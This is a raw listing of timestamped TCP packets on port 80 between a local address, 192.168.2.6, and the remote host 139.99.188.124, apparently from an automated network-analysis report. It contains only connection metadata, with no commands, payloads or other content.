                                                                                                        Dec 23, 2024 08:39:45.575845957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.575896025 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.581182957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.581305981 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.581460953 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.586532116 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.586641073 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.586716890 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.591917992 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.591988087 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.592052937 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.597285032 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.597431898 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.597664118 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.602705956 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.602803946 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.602900982 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.608061075 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.608314991 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.608731031 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.613414049 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.613554955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.613611937 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.618818998 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.618952036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.619010925 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.624175072 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.624232054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.624293089 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.629550934 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.629725933 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.629786968 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.635039091 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.635078907 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.635164022 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.640379906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.640517950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.640608072 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.645706892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.645891905 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.646015882 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.651077032 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.651154995 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.651247025 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.784152985 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.784241915 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.784316063 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.786245108 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.786317110 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.786422968 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.789571047 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.789766073 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.789843082 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.793972969 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.794109106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.794193983 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.798204899 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.798310041 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.798446894 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.802480936 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.802599907 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.802659035 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.806806087 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.806920052 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.807208061 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.811203003 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.811223984 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.811319113 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.815414906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.815546989 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.815872908 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.819684982 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.819843054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.819905043 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.823988914 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.824074030 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.824124098 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.828257084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.828424931 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.828505039 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.832601070 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.832706928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.832766056 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.836968899 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.837131023 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.837193012 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.841177940 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.841284990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.841351032 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.845472097 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.845591068 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.845668077 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.849785089 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.849993944 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.850074053 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.854077101 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.854199886 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.854255915 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.858388901 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.858489037 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.858661890 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.862695932 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.862813950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.862899065 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.867001057 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.867146015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.867309093 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.871330976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.871469021 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.871531963 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.875587940 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.875704050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.875969887 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.879880905 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.880058050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.880523920 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.884222984 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.884293079 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.884609938 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.888441086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.993915081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.993968964 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.994039059 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.995620966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.995733023 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.996129990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.996211052 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.996279001 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:45.999428034 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.999555111 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:45.999607086 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.002729893 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.002947092 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.003005981 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.005959988 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.006062031 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.006213903 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.009213924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.009335041 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.009393930 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.012315035 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.012419939 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.012476921 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.015408993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.015512943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.015639067 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.018461943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.018590927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.018970013 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.021536112 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.021624088 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.021678925 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.024636030 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.024763107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.024816990 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.027837992 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.027966976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.028034925 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.030795097 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.030896902 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.030965090 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.033884048 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.033970118 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.034040928 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.036942005 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.037101984 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.037187099 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.040024042 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.040146112 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.040200949 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.043111086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.043219090 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.043652058 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.046211958 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.046305895 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.046366930 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.049268007 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.049370050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.049426079 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.052356005 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.052453995 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.052515984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.055414915 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.055499077 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.055731058 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.058487892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.058595896 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.058662891 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.061640024 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.061743021 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.061911106 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.064697027 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.064807892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.064944983 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.067758083 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.067872047 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.067930937 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.070864916 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.070914030 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.070967913 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.073940992 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.073971033 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.074073076 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.077040911 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.077140093 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.077200890 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.080090046 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.080147028 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.080190897 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.083187103 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.083287001 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.083398104 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.086267948 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.086364031 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.086489916 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.089334965 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.089411020 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.089503050 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.092688084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.092811108 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.092994928 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.095494032 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.095617056 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.096004009 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.098591089 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.098681927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.098798037 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.101690054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.101810932 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.101926088 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.104743004 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.104862928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.105165005 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.107978106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.108280897 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.110193968 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.110930920 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.111062050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.114020109 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.114115953 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.114140987 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.114177942 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.117084026 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.117178917 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.117222071 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.120328903 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.120379925 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.120446920 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.123229027 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.206182957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.206255913 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.206262112 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.206270933 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.206305027 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.206532955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.210397959 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.210455894 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.210494995 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.210604906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.210613012 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.210674047 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.213815928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.213866949 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.213902950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.214041948 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.214124918 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.214184999 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.216264009 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.216315031 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.216382980 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.218496084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.218538046 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.218616009 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.220618963 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.220683098 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.220720053 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.222764969 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.222821951 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.222856998 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.224775076 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.224823952 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.224899054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.226912975 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.226970911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.226995945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.229012966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.229079008 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.229099989 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.231017113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.231064081 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.231103897 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.233035088 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.233119011 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.233124018 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.235105038 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.235194921 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.235263109 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.237086058 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.237168074 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.237237930 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.239109993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.239162922 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.239250898 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.241077900 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.241147041 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.241158009 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.242981911 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.243031025 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.243071079 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.244949102 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.245099068 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.245157957 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.245975018 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.246022940 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.246032953 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.247040033 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.247077942 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.247081041 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.248111963 CET8049800139.99.188.124192.168.2.6
